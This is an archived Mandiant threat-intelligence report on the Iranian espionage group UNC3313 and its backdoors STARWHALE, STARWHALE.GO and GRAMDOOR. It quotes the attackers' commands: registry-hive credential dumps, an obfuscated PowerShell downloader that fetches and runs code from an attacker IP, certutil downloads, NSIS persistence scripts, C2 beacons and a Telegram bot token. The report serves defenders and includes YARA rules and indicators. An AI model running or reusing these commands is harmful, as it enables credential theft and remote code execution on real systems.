{ "id": "b7b06d61-ada4-477f-a02f-bf39f2cbf6d9", "created_at": "2026-04-06T00:08:42.016101Z", "updated_at": "2026-04-10T03:34:22.737997Z", "deleted_at": null, "sha1_hash": "503a49981eb14d6378dffa21a0e92728d7e069c2", "title": "Left On Read: Telegram Malware Spotted in Latest Iranian Cyber Espionage Activity | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 942977, "plain_text": "Left On Read: Telegram Malware Spotted in Latest Iranian Cyber\r\nEspionage Activity | Mandiant\r\nBy Mandiant\r\nPublished: 2022-02-24 · Archived: 2026-04-05 19:46:44 UTC\r\nWritten by: Ryan Tomcik, Emiel Haeghebaert, Tufail Ahmed\r\nIn November 2021, Mandiant Managed Defense detected and responded to an UNC3313 intrusion at a Middle\r\nEast government customer. During the investigation, Mandiant identified new targeted malware, GRAMDOOR\r\nand STARWHALE, which implement simple backdoor functionalities. We also identified UNC3313 use publicly\r\navailable remote access software to maintain access to the environment. UNC3313 initially gained access to this\r\norganization through a targeted phishing email and leveraged modified, open-source offensive security tools to\r\nidentify accessible systems and move laterally. UNC3313 moved rapidly to establish remote access by using\r\nScreenConnect to infiltrate systems within an hour of initial compromise. Through the rapid coordination of\r\nMandiant Managed Defense and our customer’s security team, the incident was quickly contained and remediated.\r\nMandiant assesses with moderate confidence that UNC3313 conducts surveillance and collects strategic\r\ninformation to support Iranian interests and decision-making. Targeting patterns and related lures demonstrate a\r\nstrong focus on targets with a geopolitical nexus.\r\nThis blog post covers the details of an intrusion conducted by UNC3313, along with malware and publicly\r\navailable tools that were identified during our investigation.\r\nAttribution\r\nMandiant uses the label “UNC” groups—or “uncategorized” groups—to refer to a cluster of intrusion activity that\r\nincludes observable artifacts such as adversary infrastructure, tools, and tradecraft that we are not yet ready to give\r\na classification such as TEMP, APT, or FIN (learn more about how Mandiant tracks uncategorized threat actors).\r\nMandiant assesses with moderate confidence that UNC3313 is associated with TEMP.Zagros (reported in open\r\nsources as MuddyWater), an Iran-nexus threat actor active since at least May 2017, based on currently available\r\ninformation. TEMP.Zagros has consistently updated their toolkit over the years, using malware such as\r\nPOWERSTATS, POWGOOP, and MORIAGENT in spear-phishing operations. The group’s use of ScreenConnect\r\nfor initial compromise is well documented in open sources.\r\nNotably, on January 12, 2022, the U.S. government publicly stated it considers TEMP.Zagros as subordinate to the\r\nIranian Ministry of Intelligence and Security (MOIS) and disclosed samples of malware families (POWGOOP and\r\nMORIAGENT) in use by the group since at least 2020.\r\nTargeting\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 1 of 16\n\nIn the second half of 2021, Mandiant identified an UNC3313 campaign using GRAMDOOR and STARWHALE\r\nto target Middle Eastern government and technology entities. TEMP.Zagros has historically targeted these regions\r\nand sectors throughout the Middle East and Central and South Asia, including government, defense,\r\ntelecommunications, energy, and finance. Targeting patterns and related lures demonstrate a strong focus on\r\ntargets with a geopolitical nexus and the telecommunications sector in the Middle East.\r\nMalware Observed\r\nMandiant observed UNC3313 deploy the following malware families.\r\nMalware Family Description\r\nGRAMDOOR\r\nGRAMDOOR is a backdoor written in Python that uses the Telegram Bot API to\r\ncommunicate over HTTP with the Telegram server. Supported commands include\r\ncommand execution via cmd.exe.\r\nSTARWHALE\r\nSTARWHALE is a Windows Script File (WSF) backdoor that communicates via\r\nHTTP. Supported commands include shell command execution and system\r\ninformation collection.\r\nSTARWHALE.GO\r\nSTARWHALE.GO is a backdoor written in GO programming language that\r\ncommunicates via HTTP. The backdoor can execute shell commands and collect\r\nsystem information, such as local IP address, computer name, and username.\r\nCRACKMAPEXEC\r\nCRACKMAPEXEC is a post-exploitation tool that helps automate assessing the\r\nsecurity of large Active Directory networks.\r\nTable 1: UNC3313 Malware Families\r\nOutlook and Implications\r\nThe use of the Telegram API for command and control allows for malicious traffic to blend in with legitimate user\r\nbehavior. Combined with the use of legitimate remote access software, publicly available tools such as LIGOLO\r\nand CrackMapExec, and the multi-layer encoding routine, Mandiant believes this reflects TEMP.Zagros' efforts to\r\nevade detection and security features. Meanwhile, it is unclear how the U.S. government's recent public attribution\r\nof \"MuddyWater\" to the Iranian Ministry of Intelligence and Security will affect the group's operations. It is\r\nplausible the group may re-tool and shift their tactics, techniques, and procedures prior to conducting additional\r\noperations.\r\nUNC3313 Attack Lifecycle\r\nEstablish Foothold\r\nUNC3313 initially gained access to the customer’s environment through a spear-phishing attack that compromised\r\nmultiple systems. Phishing emails were crafted with a job promotion lure and tricked multiple victims to click a\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 2 of 16\n\nURL to download a RAR archive file hosted at the cloud storage service OneHub. This pattern is consistent with\r\nobservations in open-source reporting by Anomali and Trend Micro.\r\nThe RAR archives contained a Windows Installer .msi file that installed ScreenConnect remote access software to\r\nestablish a foothold. Figure 1 shows a Windows Installer transaction event recorded in the Windows Application\r\nlogs for the execution of performance.msi.\r\nLog: Application\r\nSource: MsiInstaller\r\nEID: 1040\r\nMessage: Beginning a Windows Installer transaction: C:\\Users\\\u003credacted\u003e\\AppData\\Local\\Temp\\Rar$EXb7468.17680\\per\r\nFigure 1: Windows Installer transaction event for performance.msi\r\nAs mentioned, UNC3313 moved rapidly to establish remote access through ScreenConnect to infiltrate systems\r\nwithin an hour of initial compromise. ScreenConnect provides the capability to issue single CLI commands to the\r\nclient or to open a full terminal using Backstage Mode. Mandiant observed command execution using cmd.exe\r\nand powershell.exe by the parent process ScreenConnect.ClientService.exe.\r\nLog: Application\r\nSource: ScreenConnect Client (f494f7a48b0cd497)\r\nEID: 0\r\nMessage: Cloud Account Administrator Connected-++-\r\nLog: Application\r\nSource: ScreenConnect Client (f494f7a48b0cd497)\r\nEID: 0\r\nMessage: Cloud Account Administrator Disconnected-++-\r\n \r\nLog: Application\r\nSource: ScreenConnect Client (f494f7a48b0cd497)\r\nEID: 0\r\nMessage: Executed command of length: 13-++-\r\nFigure 2: ScreenConnect client connection and command execution event logs\r\nWhen actively running, the ScreenConnect.ClientService.exe process performed DNS lookups for a\r\nScreenConnect relay service at instance-\u003c6 character alphanumeric id\u003e-relay.screenconnect.com. Mandiant\r\nobserved the process ScreenConnect.WindowsClient.exe write additional attacker tools to the initially\r\ncompromised hosts, indicating the files were copied through the active ScreenConnect session.\r\nFile Write Event\r\nFull Path: C:\\ProgramData\\ligo64.exe\r\nSize: 3474432\r\nMD5: 7fefce7f2e4088ce396fd146a7951871\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 3 of 16\n\nProcess: ScreenConnect.WindowsClient.exe\r\nProcess Path: C:\\Program Files (x86)\\ScreenConnect Client (f494f7a48b0cd497)\r\nParent Process Path: C:\\Program Files (x86)\\ScreenConnect Client (f494f7a48b0cd497)\\ScreenConnect.ClientService.\r\nFigure 3: File write event by the ScreenConnect Windows Client process\r\nEscalate Privileges\r\nMandiant observed UNC3313 use common credential-dumping techniques using legitimate Windows utilities.\r\nUNC3313 leveraged the open-source WMIEXEC.PY attack framework to execute reg commands to export copies\r\nof the local SAM, SYSTEM, and SECURITY Windows registry hives. WMIEXEC.PY enables simple command\r\ninvocation on a remote system (with admin rights and DCOM ports accessible on target system) via WMI\r\n(Windows Management Instrumentation).\r\ncmd.exe /Q /c reg save HKLM\\SAM C:\\users\\public\\sam 1\u003e \\\\127.0.0.1\\ADMIN$\\__1637143994.2306612 2\u003e\u00261\r\ncmd.exe /Q /c reg save HKLM\\SYSTEM C:\\users\\public\\system 1\u003e \\\\127.0.0.1\\ADMIN$\\__1637143994.2306612 2\u003e\u00261\r\ncmd.exe /Q /c reg save HKLM\\SECURITY C:\\users\\public\\security 1\u003e \\\\127.0.0.1\\ADMIN$\\__1637143994.2306612 2\u003e\u00261\r\nFigure 4: Suspicious Registry exports executed by WMIEXEC.PY\r\nUNC3313 used the Task Manager application to dump the process memory of lsass.exe, as shown in Figure 5\r\nwhen the process Taskmgr.exe wrote the file lsass.dmp.\r\nFile Write Event\r\nFull Path: C:\\Users\\\u003credacted\u003e\\AppData\\Local\\Temp\\2\\lsass.DMP\r\nSize: 59378917\r\nProcess: Taskmgr.exe\r\nProcess Path: C:\\Windows\\System32\r\nParent Process Path: C:\\Windows\\explorer.exe\r\nFigure 5: Task Manager Dump of LSASS.EXE\r\nInternal Reconnaissance and Lateral Movement\r\nMandiant observed UNC3313 leverage publicly available offensive security tools to accomplish remote command\r\nexecution, internal reconnaissance, network tunneling, and lateral movement. UNC3313 used a slightly modified\r\nversion of the open-source pen-testing tool CrackMapExec v3.0 (CRACKMAPEXEC) compiled with Pyinstaller\r\nto perform system enumeration and user account reconnaissance and to execute remote commands on target\r\nsystems. The modified version of CRACKMAPEXEC used by the attacker, named aa.exe, had the tool’s\r\ndescription removed and included the database setup code from the utility setup_database.py to bypass extra\r\ninstallation steps (Figure 6).\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 4 of 16\n\nFigure 6: Modified CRACKMAPEXEC with inclusion of setup_database.py code\"\u003e\r\nUNC3313 performed initial reconnaissance and account access testing with CRACKMAPEXEC using the\r\ncommands shown in Figure 7 and Figure 8. The credential and host information collected by CRACKMAPEXEC\r\nwere stored in the local database file cme.db.\r\naa.exe 10.20.11.1/24\r\nFigure 7: Initial execution of compiled CRACKMAPEXEC\r\naa.exe 10.20.11.1/24 -u -p --local-auth\r\nFigure 8: Local Administrator access testing with CRACKMAPEXEC\r\nUNC3313 used CRACKMAPEXEC to run the Windows utility certutil and obfuscated PowerShell commands to\r\ndownload additional tools and payloads on remote systems.\r\naa.exe 10.20.11.11 -u \u003clocal admin\u003e -p \u003cpassword\u003e --local-auth -x \"powershell -exec bypass\r\n\"function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i\r\n-lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt =\r\n[System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;};IEX (decode\r\n'J3QjPiNYUHpwd2ZuLU1mdy1Ld3dzVGZhUWZydmZwd145OUBxZmJ3Ziska3d3czksLDc2LTI3M\r\nS0xMjEtNTI5OzMsZGZGcVNrdzVgWWgwZXJkMzNlS0xtaWA6SDJbW2FvQVskKjgndC1zcWx7ei\r\nM+I1hNZnctVGZhUWZydmZwd145OURmd1B6cHdmblRmYVNxbHt6Kyo4J0Z7ZmB2d2psbUBs\r\nbXdme3ctSm11bGhmQGxubmJtZy1KbXVsaGZQYHFqc3crK01mdC5MYWlmYHcjUHpwd2ZuLU\r\npMLVB3cWZiblFmYmdmcSsndC1EZndRZnBzbG1wZisqLURmd1FmcHNsbXBmUHdxZmJuKyoqK\r\ni1RZmJnV2xGbWcrKio4' 3);\"\r\nFigure 9: Execution of obfuscated PowerShell downloader\r\nThe obfuscated PowerShell downloader used base64 encoding and simple XOR encryption that decoded to the\r\ngeneral command syntax shown in Figure 10.\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 5 of 16\n\n$w = [System.Net.HttpWebRequest]::Create('http[:]// 45.142.212[.]61:80/geErPht6cZk3fqg00fHOnjc9K1XXblBX');\r\n$w.proxy = [Net.WebRequest]::GetSystemWebProxy();\r\n$ExecutionContext.InvokeCommand.InvokeScript((New-Object System.IO.StreamReader($w.GetResponse().GetResponseStre\r\nFigure 10: Deobfuscated PowerShell command\r\nUNC3313 used the multi-platform LIGOLO tunneler utility to establish tunneled access into our customer’s\r\nenvironment. LIGOLO is an open-source, encrypted reverse SOCKS5 or TCP tunneler written in GO. The\r\nLIGOLO utility was executed with the command-line argument “-s3” to specify the relay server instead of the\r\ndocumented argument “-relayserver”, which indicates modification of the original code downloaded from the\r\nGitHub repository.\r\naa.exe 10.20.11.11 -u -p --local-auth -x \"certutil.exe -urlcache -split -f http[:]//95.181.161[.]81:443/l.exe C\r\nFigure 11: Remote execution of certutil to download LIGOLO tunneler via CRACKMAPEXEC\r\nc:\\programdata\\ligo64.exe -s3 95.181.161[.]81:5555\r\nFigure 12: Execution of LIGOLO tunneler utility with relay server\r\nMandiant observed the hostname DESKTOP-5EN5P2I in Windows logon events on systems that were accessed\r\nby UNC3313 through an RDP connection tunneled using LIGOLO.\r\nLog: Security\r\nEID: 4624\r\nNetwork Information:\r\nWorkstation Name: DESKTOP-5EN5P2I\r\nSource Network Address: -\r\nSource Port: -\r\nLog: Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational\r\nEID: 1149\r\nUser:\r\nDomain: DESKTOP-5EN5P2I\r\nSource Network Address: 10.20.11.14\r\nFigure 13: Windows logon events showing evidence of RDP session tunneling via LIGOLO\r\nMaintain Persistence\r\nMandiant identified a new malware family named STARWHALE that was used by UNC3313. STARWHALE is a\r\nWindows Script File backdoor that simply receives commands from a command and control (C2) server via HTTP\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 6 of 16\n\nand executes those commands via Windows cmd.exe. On the infected system, STARWHALE was observed being\r\nexecuted with a command-line argument as shown in Figure 14.\r\ncmd.exe /c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback__whale\r\nFigure 14: STARWHALE execution\r\nFigure 15: STARWHALE Code Snippet\r\nThe command line argument \"humpback__whale \" is used in the code to dynamically resolve functions at runtime\r\nusing the VBScript function GetRef. Since STARWHALE does not contain any persistence mechanism, a service\r\nis created as shown in Figure 16.\r\nsc create Windowscarpstss binpath= \"cmd.exe /c cscript.exe c:\\\\windows\\\\system32\\\\w7_1.wsf humpback__whale\" sta\r\nFigure 16: STARWHALE Persistence Method\r\nSTARWHALE communicates with its C2 server, which is hardcoded in the malware. Upon first execution, the\r\nmalware gathers basic user and system information, such as local IP address, computer name, and username. It\r\nthen encodes this information using a custom encoding scheme before sending the information to the C2 IP\r\naddress as shown in Figure 17.\r\nPOST /jznkmustntblvmdvgcwbvqb HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded; Charset=UTF-8\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nCharSet: UTF-8\r\nContent-Length: 69\r\nHost: 5.199.133[.]149\r\nvl=27732737231435E335F4239537109C22531327535C22D1327235E46253E2215613\r\nFigure 17: STARWHALE Beacon\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 7 of 16\n\nThe hex value passed via the POST request parameter “vl=”, as shown in Figure 17, can be decoded to the\r\nfollowing system enumeration information, piped together and separated with a delimiter:\r\n|delimiter|\\\\\u003cusername\u003c span=\"\"\u003e \u003c/username\u003c\u003e\r\nThe delimiter in the samples observed was “|!)!)!|”. It then expects its C2 server to return a string value that is\r\nencoded using the same scheme. This string value is then included in all subsequent POST requests. If\r\nSTARWHALE’s initial request is successful, it begins sending the session key in a loop via HTTP POST requests\r\nto its C2 server at hxxp://5.199.133[.]149/oeajgyxyxclqmfqayv. The C2 server will then respond with a command\r\nmeant to be executed via cmd.exe, as shown in Figure 18.\r\ncmd.exe /c \u003ccommand\u003e \u003e\u003e %temp%\\stari.txt.\r\nFigure 18: STARWHALE command execution process\r\nThe output of the command is written to a file called “stari.txt.” It then encodes the output using the custom\r\nscheme and sends it back to the C2 server in its next POST request. The structure is similar to what is shown in\r\nFigure 19.\r\n\u003cc2_session_key\u003e|!)!)!|\u003ccommand_output\u003e\r\nFigure 19: STARWHALE information sent to C2\r\nIf the command fails, it sends the encoded string \"SoRRy\" to its C2. Notably, in earlier iterations of\r\nSTARWHALE, Mandiant also observed it using the string \"sory\" [sic]. The threat actor corrected the spelling\r\nerror after security researchers highlighted the string in a public forum. Mandiant has observed similar spelling\r\nerrors in other campaigns by Iranian threat actors.\r\nDuring the intrusion, Mandiant also observed the actors deploying a malware that shares a lot of similarities with\r\nSTARWHALE in design but written in Golang. Mandiant is calling this code family STARWHALE.GO. It is\r\ndownloaded on the system using the certuil.exe utility as shown in Figure 20.\r\ncertutil.exe -urlcache -split -f hxxp://95.181.161[.]81:443/per_indexx.exe\r\nFigure 20: STARWHALE.GO download\r\nSTARWHALE.GO arrives as part of a Nullsoft Scriptable Install System (NSIS) installer, which installs it in a\r\ndirectory called OutlookM and creates a Run key in Windows registry to make it persistent on the system. Upon\r\nexecution, it drops the Golang binary and executes it.\r\nInstType $(LSTR_37) ; Custom\r\nInstallDir $LOCALAPPDATA\\OutlookM\r\n; install_directory_auto_append = OutlookM\r\n; wininit = $WINDIR\\wininit.ini\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 8 of 16\n\n; --------------------\r\n; SECTIONS: 1\r\n; COMMANDS: 6\r\nSection ; Section_0\r\n ; AddSize 4744\r\n CreateDirectory $INSTDIR\r\n SetOutPath $INSTDIR\r\n File index.exe\r\n Exec $INSTDIR\\index.exe\r\n WriteRegStr HKCU SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run OutlookM $INSTDIR\\index.exe\r\nSectionEnd\r\nFigure 21: NSIS Script Snippet for STARWHALE.GO\r\nThe following registry key is created as a result of running the NSIS executable.\r\nKEY: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM\r\nValue: C:\\Users\\\u003credacted\u003e\\AppData\\Local\\OutlookM\\index.exe\r\nFigure 22: STARWHALE.GO Persistence Method\r\nSTARWHALE.GO also uses a custom data encoding algorithm to protect its network communication and critical\r\nstrings within the binary. It sends the same information as STARWHALE, but the data sent and received are a\r\nJSON object. A sample HTTP POST request is shown in Figure 23.\r\nPOST /nnskfepmasiiohvijcdpxtxzjv HTTP/1.1\r\nHost: 87.236.212[.]184\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 91\r\nContent-Type: application/json\r\nAccept-Encoding: gzip\r\n{\"vl\":\"2179526e3176587ec7557e4192495c46264556569c47693e8d39415432445722222733323323332333\"}\r\nFigure 23: STARWHALE.GO HTTP C2 beacon\r\nSTARWHALE.GO uses a different delimiter “|\u0026\u0026%\u0026\u0026|” than STARWHALE, but the rest of the enumerated\r\ninformation sent to the hardcoded C2 IP address is the same. Similarly, the malware reads the response from the\r\nPOST request to the C2 server and attempts to decode it using the same custom string transformation routine it\r\nused to encode the data it sent. This routine is simpler than that used by STARWHALE, as explained later. The\r\ndecoded result is either launched as a command line with the process \"cmd.exe /c\" or launched directly as a\r\nprocess if the string ends with .com, .exe, .bat, or .cmd. The output of the launched process, or error message in\r\nthe case of a failure to decode the string, is sent to the C2 server via HTTP POST requests to its C2 server at\r\nhxxp://87.236.212[.]184/cepopggawztuxkxujfjbnpv.\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 9 of 16\n\nMandiant identified a third UNC3313 backdoor during the investigation that was compiled with Python 3.9 and\r\npackaged via PyInstaller, which would only execute on Windows 8 and higher. Mandiant has named this backdoor\r\nGRAMDOOR due to its ability to use the Telegram Bot API for communication. It sends and receives messages\r\nfrom an actor-created Telegram chat room. GRAMDOOR arrives on the system packaged as an NSIS installer,\r\nwhich establishes a persistence mechanism by setting the Windows Run registry key, as shown in Figure 24.\r\nKEY: HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift\r\nValue: C:\\Users\\\u003credacted\u003e\\AppData\\Roaming\\OutlookMicrosift\\index.exe\" Platypus\r\nFigure 24: GRAMDOOR Persistence Method\r\nThe NSIS installer for GRAMDOOR drops the PyInstaller packaged binary in the APPDATA directory in a\r\nsubdirectory named OutlookMicrosift. It is executed using Exec command from the install directory, as shown in\r\nFigure 25.\r\nInstType $(LSTR_37) ; Custom\r\nInstallDir $APPDATA\\OutlookMicrosift\r\n; install_directory_auto_append = OutlookMicrosift\r\n; wininit = $WINDIR\\wininit.ini\r\n; --------------------\r\n; SECTIONS: 1\r\n; COMMANDS: 6\r\nSection ; Section_0\r\n ; AddSize 16859\r\n CreateDirectory $INSTDIR\r\n SetOutPath $INSTDIR\r\n File index.exe\r\n Exec \"$INSTDIR\\index.exe Platypus\"\r\n WriteRegStr HKCU SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run OutlookMicrosift \"$\\\"$INSTDIR\\index.exe$\\\" Plat\r\nSectionEnd\r\nFigure 25: NSIS Script Snippet for GRAMDOOR\r\nGRAMDOOR expects to be launched with one command-line parameter, which in this case was \"Platypus.\" It\r\nuses this command-line parameter to piece together the function name, which is then called and acts as the entry\r\npoint to the malware. GRAMDOOR implements only two commands: start and com. These commands are used to\r\nlaunch a cmd.exe process to which commands are piped. All network communication is via the Telegram server\r\nat api.telegram[.]org. This allows the actors to disguise their communication as regular Telegram traffic. This\r\ntechnique is not novel, and it is not the first time Iranian actors abused publicly available software to make their\r\nC2 traffic blend in.\r\nAll HTTP requests from the malware to the Telegram server contained the token string\r\n2003026094:AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY. The token strings are used to authenticate to the bot.\r\nFigure 26 shows a sample request.\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 10 of 16\n\nhxxps://api.telegram[.]org/bot2003026094:AAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY/sendMessage?\r\nchat_id=\u003cchat_id\u003e\u0026parse_mode=Markdown\u0026text=\u003ccontent\u003e\r\nFigure 26: GRAMDOOR Sample Request\r\nThe malware uses the sendMessage API function to send information to a chat ID number. The actors interact\r\nwith the host via the chat by issuing commands and then getting output of the executed commands sent back in the\r\nchat. For example, to retrieve network configuration information from the infected host, the attacker would issue\r\nthe command “com\u003cid\u003e c607666261766066f9f23ec696” where the value “c607666261766066f9f23ec696” is\r\ntranslated to “ipconfig /all” command.\r\nSTARWHALE and GRAMDOOR share similarities in logic for the custom encoding scheme used for the data and\r\ncommands sent to and received from the C2. The following code snippet demonstrates STARWHALE’s traffic\r\nencoding and decoding and GRAMDOOR’s commands passed back and forth between Telegram chat messages.\r\ndef transform_chars(data):\r\n data = list(data)\r\n src = 0\r\n dst = len(data) - 1\r\n while src \u003c dst:\r\n t = data[src]\r\n data[src] = data[dst]\r\n data[dst] = t\r\n src += 3\r\n dst -= 2\r\n return ''.join(data)\r\ndef decode_traffic(data):\r\n return bytes.fromhex(transform_chars(transform_chars(data)[::-1])).decode('utf')\r\ndef encode_traffic(data):\r\n return transform_chars(transform_chars(data.encode('utf').hex())[::-1])\r\nFigure 27: Encoding/Decoding custom routine example code snippet\r\nGRAMDOOR also hides sensitive strings within its code using a custom XOR-based encryption scheme. The\r\nfollowing sample code shows the logic of the aforementioned scheme.\r\ndef xor_transform(data):\r\n key = '`qLd' + str(5) + 'Hm^yw/sG-qh\u0026@~y|[dJmC' + str(6) + 'UFvNt-^^_FeSd' + str(4) + 'N*#GNophwQ-MCJ' + str\r\n return ''.join((lambda .0: [ chr(ord(c1) ^ ord(c2)) for c1, c2 in .0 ])(zip(data, key)))\r\n \r\ndef encode_str(data):\r\n return base64.b64encode(xor_transform(data).encode())\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 11 of 16\n\ndef decode_str(data):\r\n return xor_transform(base64.b64decode(data).decode())\r\nFigure 28: Sample snippet showing XOR-based encryption scheme used in GRAMDOOR\r\nMandiant also observed UNC3313 store PowerShell downloader commands in Registry keys that were referenced\r\nby a Scheduled Task named “Oracle scheduled assistant Autoupdate” that is triggered on user logon.\r\nPath: HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Oracle\\Pre\r\nType: REG_SZ\r\nValue Name: Pre\r\nText: IEX\r\nFigure 29: PowerShell command stored in Registry Value “Pre”\r\nPath: HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Oracle\\Post\r\nType: REG_SZ\r\nValue Name: Post\r\nText: function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);\r\nfor($i=0; $i -lt $enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt = [System.Text.Encoding]::UTF\r\n$o.proxy = [Net.WebRequest]::GetSystemWebProxy();$ExecutionContext.InvokeCommand.InvokeScript((decode (New-Objec\r\nFigure 30: PowerShell command stored in Registry Value “Post”\r\nLastly, Mandiant observed UNC3313 download and execute a Windows Installer file for the eHorus remote access\r\ntool from the vendor website. UNC3313 executed the file ehorus_installer_windows-1.1.3-x64_en-US.msi, which\r\ncreated a service named EHORUSAGENT. The eHorus agent process ehorus_agent.exe communicates with\r\ndomains hosted on ehorus[.]com.\r\nLog: System\r\nSource: Service Control Manager\r\nEID: 7045\r\nService Name: eHorus Agent Launcher\r\nService File Name: \u0026amp;quot;C:\\Program Files\\ehorus_agent\\ehorus_launcher.exe\u0026amp;quot; -s\r\nFigure 31: Service installation for eHorus agent\r\neHorus is a legitimate remote access tool advertised commercially by Pandora FMS, which is based in Spain.\r\neHorus has been recently reported by Symantec being abused by Iranian threat actors in a similar campaign\r\nagainst telecom organizations in Middle East and Asia.\r\nMandiant Targeted Attack Lifecycle\r\nLearn more about the Mandiant Targeted Attack Lifecycle.\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 12 of 16\n\nFigure 32: Mandiant Targeted Attack Lifecycle\r\nMITRE ATT\u0026CK Techniques\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA102-562 Command and Control - GRAMDOOR, DNS Query, Variant #1\r\nA102-563 Malicious File Transfer - GRAMDOOR, Download, Variant #1\r\nA102-564 Malicious File Transfer - GRAMDOOR, Download, Variant #2\r\nA102-565 Malicious File Transfer - STARWHALE, Download, Variant #1\r\nA102-566 Malicious File Transfer - STARWHALE, Download, Variant #2\r\nA102-567 Malicious File Transfer - STARWHALE, Download, Variant #3\r\nA102-568 Malicious File Transfer - STARWHALE.GO, Download, Variant #1\r\nA104-975 Protected Theater - GRAMDOOR, Execution, Variant #1\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 13 of 16\n\nA104-976 Protected Theater - STARWHALE, Execution, Variant #1\r\nA104-977 Host CLI - GRAMDOOR, Registry Persistence, Variant #1\r\nA104-978 Host CLI - STARWHALE, Service Persistence, Variant #1\r\nYARA Rules\r\nrule M_Hunting_Backdoor_STARWHALE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects strings for STARWHALE samples\"\r\n md5 = \" cb84c6b5816504c993c33360aeec4705\"\r\n rev = 1\r\n strings:\r\n $s1 = \"JSCript\" ascii nocase wide\r\n $s2 = \"VBSCript\" ascii nocase wide\r\n $s3 = \"WScript.Shell\" ascii nocase wide\r\n $s4 = \"ok\" ascii nocase wide\r\n $s5 = \"no\" ascii nocase wide\r\n $s6 = \"stari.txt\" ascii nocase wide\r\n $s7 = \"SoRRy\" ascii wide\r\n $s8 = \"EMIP\" ascii wide\r\n $s9 = \"NIp\" ascii wide\r\n $s10 = \"401\" ascii wide\r\n $s11 = \"_!#\" ascii wide\r\n $s12 = \"/!\u0026^^\u0026!/\" ascii wide\r\n $s13 = \"|!)!)!|\" ascii wide\r\n $s14 = \"|#@*@#|\" ascii wide\r\n $s15 = \"/!*##*!/\" ascii wide\r\n $s16 = \"sory\" ascii nocase wide\r\n condition:\r\n filesize \u003e 5KB and filesize \u003c 5MB and 10 of ($s*)\r\n}\r\nrule M_Hunting_Backdoor_STARWHALE_GO_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects strings for STARWHALE.GO\"\r\nstrings:\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 14 of 16\n\n$main1 = \"main.findExecutable\" ascii\r\n $main2 = \"main.showMatrixElements\" ascii\r\n $delim = \"|\u0026\u0026%\u0026\u0026|\" ascii\r\n $matrix = \"MATRIX1*MATRIX2\" ascii\r\n $sample = \"1522526f4260f4653664276774\" ascii\r\n \r\ncondition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize \u003c 15MB and 4 of them\r\n}\r\nIndicators of Compromise\r\nType Value Description\r\nMD5 7c3564cd166822be4932986cb8158409 CrackMapExec\r\nMD5 7fefce7f2e4088ce396fd146a7951871 LIGOLO\r\nMD5 5763530f25ed0ec08fb26a30c04009f1 GRAMDOOR\r\nMD5 15fa3b32539d7453a9a85958b77d4c95 GRAMDOOR\r\nMD5 cb84c6b5816504c993c33360aeec4705 STARWHALE\r\nMD5 c8ff058db87f443c0b85a286a5d4029e ScreenConnect\r\nIP 88.119.175[.]112 LIGOLO C\u0026C\r\nIP 95.181.161[.]50 LIGOLO C\u0026C\r\nIP 45.153.231[.]104 LIGOLO C\u0026C\r\nIP 95.181.16[.]81 Malware/Tools Hosting\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 15 of 16\n\nIP 5.199.133[.]149 STARWHALE C\u0026C\r\nIP 45.142.213[.]17 STARWHALE C\u0026C\r\nIP 87.236.212[.]184 STARWHALE.GO C\u0026C\r\nAcknowledgements\r\nSpecial thanks to Mike Hunoff, Nick Harbour, and Muhammad Umair for their assistance with reverse\r\nengineering the malware discussed in this blog post, and Adrien Bataille and Ervin James Ocampo for creating\r\ndetections for malware families. Additionally, we would also like to thank Dan Andreiana, Alexander Pennino,\r\nNick Richards, Jake Nicastro, Sarah Jones, and Geoff Ackerman for their help with technical review and\r\nproviding valuable feedback.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nhttps://www.mandiant.com/resources/telegram-malware-iranian-espionage\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", 